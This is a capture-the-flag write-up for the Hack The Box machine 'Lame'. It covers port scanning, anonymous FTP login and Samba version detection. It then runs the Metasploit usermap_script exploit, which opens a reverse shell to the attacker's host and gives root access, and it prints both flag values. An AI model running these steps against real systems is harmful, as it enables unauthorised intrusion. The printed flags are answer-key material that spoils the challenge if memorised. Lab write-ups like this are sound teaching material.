Lame Write-Up

Machine IP - 10.10.10.3

Initial Phase

Initially starting with an nmap scan -

root@kali:~/Desktop/Hack The Box/lame# nmap -F 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-11 19:17 +04
Nmap scan report for 10.10.10.3
Host is up (0.37s latency).
Not shown: 96 filtered ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds

Immediately FTP seems to be an attack vector. Therefore, trying an anonymous login, we get in -

root@kali:~/Desktop/Hack The Box/lame# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.

The messages here don't seem to be legit and doesn't prove worth continuing as changing the directories also doesn't work. Now we can turn to other ports. SSH seems totally out of reach; Therefore, turning to the Samba ports. We can search for scanners of samba on metasploit -

msf5> search scanner/smb

Matching Modules
================

   Name                                         Disclosure Date  Rank    Check  Description
   ----                                         ---------------  ----    -----  -----------
   auxiliary/scanner/smb/impacket/dcomexec      2018-03-19       normal  Yes    DCOM Exec
   auxiliary/scanner/smb/impacket/secretsdump                    normal  Yes    DCOM Exec
   auxiliary/scanner/smb/impacket/wmiexec       2018-03-19       normal  Yes    WMI Exec
   auxiliary/scanner/smb/pipe_auditor                            normal  Yes    SMB Session Pipe Auditor
   auxiliary/scanner/smb/pipe_dcerpc_auditor                     normal  Yes    SMB Session Pipe DCERPC Auditor
   auxiliary/scanner/smb/psexec_loggedin_users                   normal  Yes    Microsoft Windows Authenticated Logged In Users Enumeration
   auxiliary/scanner/smb/smb1                                    normal  Yes    SMBv1 Protocol Detection
   auxiliary/scanner/smb/smb2                                    normal  Yes    SMB 2.0 Protocol Detection
   auxiliary/scanner/smb/smb_enum_gpp                            normal  Yes    SMB Group Policy Preference Saved Passwords Enumeration
   auxiliary/scanner/smb/smb_enumshares                          normal  Yes    SMB Share Enumeration
   auxiliary/scanner/smb/smb_enumusers                           normal  Yes    SMB User Enumeration (SAM EnumUsers)
   auxiliary/scanner/smb/smb_enumusers_domain                    normal  Yes    SMB Domain User Enumeration
   auxiliary/scanner/smb/smb_login                               normal  Yes    SMB Login Check Scanner
   auxiliary/scanner/smb/smb_lookupsid                           normal  Yes    SMB SID User Enumeration (LookupSid)
   auxiliary/scanner/smb/smb_ms17_010                            normal  Yes    MS17-010 SMB RCE Detection
   auxiliary/scanner/smb/smb_uninit_cred                         normal  Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   auxiliary/scanner/smb/smb_version                             normal  Yes    SMB Version Detection


msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 10.10.10.3:445        - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 10.10.10.3:445        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This gives us the version of the SMB.

Attack Phase

Now that the version of the SMB is known, we can simply google samba 3.0.20 exploit. The first thing that turns up is an exploit from metasploit itself on the website of rapid7. The path for the exploit is given, therefore this can be tried out in metasploit as follows -

msf5 auxiliary(scanner/smb/smb_version) > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.14.68:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo AyjQ29Pvdsjki9wn;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nAyjQ29Pvdsjki9wn\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.68:4444 -> 10.10.10.3:35452) at 2019-04-11 19:29:29 +0400

whoami
root
python -c 'import pty; pty.spawn("/bin/bash");'
root@lame:/# cd /home
cd /home
root@lame:/home# ls
ls
ftp  makis  service  user
root@lame:/home# cd makis
cd makis
root@lame:/home/makis# ls
ls
user.txt
root@lame:/home/makis# cat user.txt
cat user.txt
69454a937d94f5f0225ea00acd2e84c5
root@lame:/home/makis# cd /root
cd /root
root@lame:/root# ls
ls
Desktop  reset_logs.sh  root.txt  vnc.log
root@lame:/root# cat root.txt
cat root.txt
92caac3be140ef409e45721348a4e9df

And that's how we obtain root user on the box and therefore get the root and user flags.